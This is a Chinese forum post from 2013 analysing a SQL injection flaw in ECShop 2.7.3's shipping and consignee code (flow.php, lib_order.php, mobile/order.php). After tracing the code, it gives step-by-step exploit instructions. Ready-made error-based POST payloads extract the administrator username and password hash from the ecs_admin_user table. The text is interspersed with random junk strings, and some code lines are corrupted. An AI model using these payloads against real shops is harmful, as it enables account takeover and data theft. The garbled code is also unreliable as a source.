前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。
- s2 b7 S {3 Q) f& _; P& N, N; G t# P. U0 u' U5 h9 T% q3 [3 I
漏洞关键文件:
* p% n( n; C0 ~" c9 k9 E, O* Z6 r+ ]' F& a4 l# Q- h5 p6 e
/includes/lib_order.php3 ^( \! z& |) f4 T
; t; @$ A! m3 r- b! @/ j
关键函数:
6 I' D) C3 Z- y- P. X+ c% d2 n$ N, i& v
: C/ K6 ?2 _( K 8 m: `4 P" f6 f2 @( o
9 R0 X% W6 O4 O/ D+ V
01 function available_shipping_list($region_id_list)
( i: i! \' V, o6 I/ X6 m" V1 S2 C7 H0 ]" B0 }! |0 q, @! x, ~. n
02 { # {6 l. h1 q# Q( @) w o$ U
K7 x* V) \& f; I. g. d
03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
5 v* b* a! m6 v* i, \6 v) F' V/ z+ p9 h1 }8 x- ]+ w
04 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
9 ]" U& x+ ]. x( d) Y! x' P
, h8 ]5 M: L8 z) ~7 A05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
# ^4 G( z' u3 A9 z7 n% Q. ^, e, `$ T" G& X
06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' . 3 Q# ]/ Z# V) O K
' V0 g5 I+ [: F9 ]07 $GLOBALS['ecs']->table('area_region') . ' AS r '. * f0 l- B0 W1 i7 i4 w4 H8 g
% B0 N9 n' R9 N8 h" ^0 G/ B
08 'WHERE r.region_id ' . db_create_in($region_id_list) . % ~3 g# ~7 F. C6 F; y: \3 X/ A O) m
- ]4 l* m. W4 U( i7 n; A4 ?
09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
6 L3 E5 {- v M+ n" i1 ?# f4 L& E$ H5 D8 o
10
* j6 U! g/ J& f. @: H' K, E1 {
. B# W; E& y' S7 f) ?3 z11 return $GLOBALS['db']->getAll($sql);
" A) p6 y2 S1 a6 ]! p1 H8 G }) b0 ]0 `/ d! A [: h% v
12 } + g+ Y& t' E6 v) L9 r: M
- e. v0 T( y: J& w, L显然对传入的参数没有任何过滤就带入了查询语句。
" C. ^9 _* d1 a# R3 t$ A. x " t! y* W! x( F4 ~ j
下面我们追踪这个函数在flow.php中:
$ h$ {/ W* G! s/ X8 l' X 第531行:
) c! z. q6 U! P) X! C7 r
& f) |. q4 S5 X% r, A1 $shipping_list = available_shipping_list($region); + m# ^9 g5 O' X# D7 [
$ }4 t' m2 W1 e- M
7 @1 J; g/ S8 E7 ], _1 k- E1 B% d) y
( j% X$ S: c r% W2 H2 T
$ F. I0 z! B7 _, x( |2 s9 k* @再对传入变量进行追踪:, R, _, e$ G8 J' A+ k0 r0 n
0 U6 H( `7 N3 e0 i+ b* A& Y
第530行:
3 S" X) `# F7 y& E3 a Z
( V8 g- O/ M; Y8 Y& u5 N3 \5 q1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']); 7 `' x6 s/ @ L \7 L. G0 f# I
: s0 Q$ W' f- P# t9 n c* o; s
B# l% Z/ V9 V+ T: x6 ]0 m; N# h
2 p I7 U- i3 G' ~9 j, s ( W" A0 ?2 f2 r$ h W
/ w" W# r: M- M第473行: 5 h4 Q' S3 ^3 `% c+ C
9 R( T: A! q1 k n1 $consignee = get_consignee($_SESSION['user_id']); . T7 ?9 b9 c" s8 v5 d2 x
; h: Z1 M) g, L到了一个关键函数:; @6 C( u1 K" l$ Y9 ~
' [7 B( `& `9 m" u: U
/includes/lib_order.php
2 K7 I+ j( i6 k8 G
- c# {& ~( W7 L z* I$ x, u7 {, T
& Y- h6 `3 P" d5 B
* X o% }: O: K$ e4 v7 w
& c( G9 g% K5 n! l+ v
. O) Z. J& [2 P! R01 function get_consignee($user_id) ; s' N* g/ v! \% N' W
" n, T- d- I$ F
02 { 5 s. g( K9 _8 w
! e/ [$ t) T$ [' V5 |- I
03 if (isset($_SESSION['flow_consignee'])) 1 I0 o. d" t4 {- N6 `
' N( N Z1 q: ?6 _! C1 N( @
04 { + ?7 b. Z. O1 L8 q
3 R6 s+ L/ K, b/ i05 /* 如果存在session,则直接返回session中的收货人信息 */
6 j( T: x3 M& A6 P3 c/ T8 k! E4 X: ~& ~0 y8 T$ X
06 2 c& O. } y2 C4 x9 k& T ^/ a
, H3 G: P2 D9 W07 return $_SESSION['flow_consignee'];
6 ?2 [9 r7 Z) y0 P# m) b6 O. u* x" z w1 w. I$ {
08 }
! J8 Q8 |2 @' k3 ?5 \; k1 I) z' K/ z: R5 O$ j3 V
09 else ! H0 ?# [. a& u1 ~7 v/ o2 c
9 \5 S0 ^' c# A: e9 M9 R+ Z, Z
10 { 0 T ]$ H9 y+ r" {: \3 Z" {3 K
! W' y8 W2 c7 W% f3 _1 |( ^# A11 /* 如果不存在,则取得用户的默认收货人信息 */ 3 k3 ?. q/ N% {( ^% M3 r
: i7 [/ b/ `# r( |: E
12 $arr = array(); 8 w4 l% c2 s* b* f5 F/ O
9 ?' c! r3 ~: \1 X
13
% q& O& \) E7 \
2 P5 [* j* E& w5 \14 if ($user_id > 0) ( w) F5 o2 M; @: A4 v0 d
/ W% w0 k6 k& ]) a# r K) \9 O15 {
" @! \5 H/ H: E9 O* l b j
. b! @3 R( E0 y- O16 /* 取默认地址 */ # x7 T4 Y3 g1 m2 \
, M: k; c/ q4 k6 m17 $sql = "SELECT ua.*".
+ }( o5 S7 C) W( }! H$ n, _- _: h, u3 P1 R
18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '. ' w2 }+ {" a/ _
: }; K$ F! x% T2 C7 H
19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
1 s+ m: D3 A' L/ Z) p. g( l* m0 S7 y# n. y
20 3 ]1 y) X3 y2 c8 b; Y; w* X6 H
. L( W: v F$ D( V& q3 k8 ?% d
21 $arr = $GLOBALS['db']->getRow($sql);
5 [2 V1 [$ T! }! T' ?1 M6 J
: Y, P% r3 J8 V+ \2 G; Y5 D22 }
4 p8 X( u3 B' l6 \8 F$ K! l" J5 x& u1 h8 O5 H, M: g/ ^( t$ c
23 " n& U. T* J! ~2 T
0 U% L8 ~0 }9 S- g) R24 return $arr;
; A4 h" i$ y( W5 }' D! t/ [- {8 z- b, Y* v
25 } 7 n- A3 r9 A- J6 Z, b0 s
6 p9 _$ {& S9 n8 r% m
26 } + Y- }! b% `6 R( P3 p2 Q
" ?8 v6 M3 n1 e- R* g显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?2 A( I) P. ?% V3 d
0 w$ A9 g( `( r
0 Y" o6 |0 z& A6 m; r! [" B1 J& U# ~) {# G8 z
关键点:( n& h! J' _+ F$ [, }; A
8 w q! X3 g( J! b* ~- T第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
) X& i/ Q4 E3 f9 e1 T
) \7 G h9 y" e, Y这里对传入参数反转义存入$_SESSION中。! x( S2 R+ b9 V Y# ^; D4 t- O/ a
. \1 h7 K! h& Z4 V
0 t: r. l( D' a6 }7 O( s3 f" Z/ R8 l1 N6 m; V
然后看下:
c9 _7 a- I- E/ s' J; P- B: q7 b& u. u
; y+ ^! B2 F1 W9 a) p8 t4 P& H( d- k0 N" p5 z
* S* _! U1 t' f* f- Z' D. L' F! Q3 q; \7 P1 V ^" m) r1 D9 t7 ?
01 $consignee = array( ! L8 ^! Y. \2 f/ j" U0 S
" Q+ P& Q2 z. g- H02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']), " B& Q+ M! k9 m; o/ \ V
' R, r; K' ?* b03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
( M7 \; l% U4 m+ m
$ T6 ~, u- b! k% m% C8 f* b p( g8 y04 'country' => empty($_POST['country']) ? ''  _POST['country'], ' a$ M/ k3 d h3 ~, l
6 ], \7 D: O$ w% L8 S9 [05 'province' => empty($_POST['province']) ? '' _POST['province'], 6 _# v0 U% Q5 W8 L+ s6 q
1 a9 |# e; G, Y06 'city' => empty($_POST['city']) ? '' _POST['city'], ( f4 Y! v; g) s4 P8 c' d: C
5 f: w- i- ?" b; Y: {. }9 K. Y4 ^07 'district' => empty($_POST['district']) ? '' _POST['district'], 2 h7 n3 p- x/ t( l2 A% N' a
0 z& }. ]6 { W0 `7 o3 I4 L
08 'email' => empty($_POST['email']) ? '' _POST['email'], W+ r5 s2 u9 O r8 S, o
9 A7 N" u/ y( s( g! e% R N1 s09 'address' => empty($_POST['address']) ? '' _POST['address'], 8 t5 C' g6 I+ q" l/ d
# N, `0 s0 X" {& f1 v8 Q2 S" o/ R10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])), : m" ?. {9 W6 q" @
, M* j5 W7 Z2 s9 `5 z' T, _11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])),
& |2 \1 Y+ {' c1 E: M3 u1 Z9 `8 K$ ~ i, Y7 j0 L3 D$ N
12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])),
' e" o9 }# T( }* O( z8 X3 Y' ~: y% y1 J! u0 T' g
13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
8 h. m# e" R( ~7 u2 {* p/ p4 n
2 l1 |& G* n4 n& @8 o, y. X& \% Y14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'], ; J5 e' a' ~4 G: N# P
- K. n; o3 R+ [2 H( h6 V x
15 ); % `5 C9 ?' `' A* a3 E
9 s4 Q H; }3 F* L' Z
好了注入就这样出现了。
& I7 G, Z% I1 F" |& m3 }# }" Z, @% T$ c, P! `4 k. A* R* C' ?
==================
% N/ R4 n& c( J: J
% p' \4 s" A& ~; A( _" Q7 a& Y注入测试:
3 b4 b6 K$ M5 \* ]: ~: T6 P6 \4 N$ _
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
& d0 ?- \8 g* V1 M
& v/ t; t5 M% @. v测试程序:ECShop_V2.7.3_UTF8_release1106
/ c8 q3 l/ U! w7 |. t9 m- t* B0 m) C. m/ U) b, o3 u" g _5 R2 u/ p
1 m+ O0 o7 f c+ d; ^6 x* P; Y3 H) f3 w7 g
1.首先需要点击一个商品加入购物车7 ~7 N* c F0 Q4 d# m
2 i) l n, V; T d( `
2.注册一个会员帐号6 e* M) m$ I. `
# b) E8 X' J, I$ a+ M% E# S. n7 e7 x3.post提交数据
. N/ P2 h" P1 c# z w3 \) I i. G1 j7 I7 r4 o- O* M9 V1 Y
1 P: m1 Y# l9 {3 A
: j9 r0 I/ X( O( R, L- K1 http://127.0.0.1/ecshop/flow.php
( @9 L/ |6 Q$ ~
8 H. W$ U* U" V" l( x2 ( @" L8 u( X: l# C8 R: q! L& {
) x% m; @5 n$ M# Y
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id= . @5 B5 {' C7 B
举一反三,我们根据这个漏洞我们可以继续深入挖掘:
6 j4 O. L8 R4 Q4 k6 z
8 `- r: m' ?% `3 ~0 _& M1 d我们搜寻关键函数function available_shipping_list()
4 z R& N+ r4 A4 V" K9 Z) z+ c) e# k/ {+ a. K
在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同
% C% V$ b3 s+ E
8 ~! o2 l, B7 S* I) @利用exp:$ Y; y# L. H) `7 s7 X( N
5 n7 u* Y* [/ j, r! m
1.点击一个商品,点击购买商标
9 J; O6 u( h Q2 j& n9 F. w
% g" S4 c' A9 v! {' J9 b: a+ V2.登录会员帐号
: B0 d& S/ U: O6 _8 x' g* ?0 k2 O: x$ w2 Y3 t( b* c# Q1 ~
3.post提交:) n5 B' v( G" \ Y5 E' q
0 ^% a/ Q1 b- lhttp://127.0.0.1/ecshop/mobile/order.php
5 O/ [! W3 }/ v
; R6 i% a& Y" m* ]' c0 S+ T/ C" E+ @
5 @+ H2 t% ]2 c: ^. n, F3 ~( b# w4 d% W9 Y
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id= f# s0 T, M3 U) y, K
" J2 x- m" |& x+ _% [( s: I6 h |
发表于 2013-1-13 09:48:03
收藏
支持
反对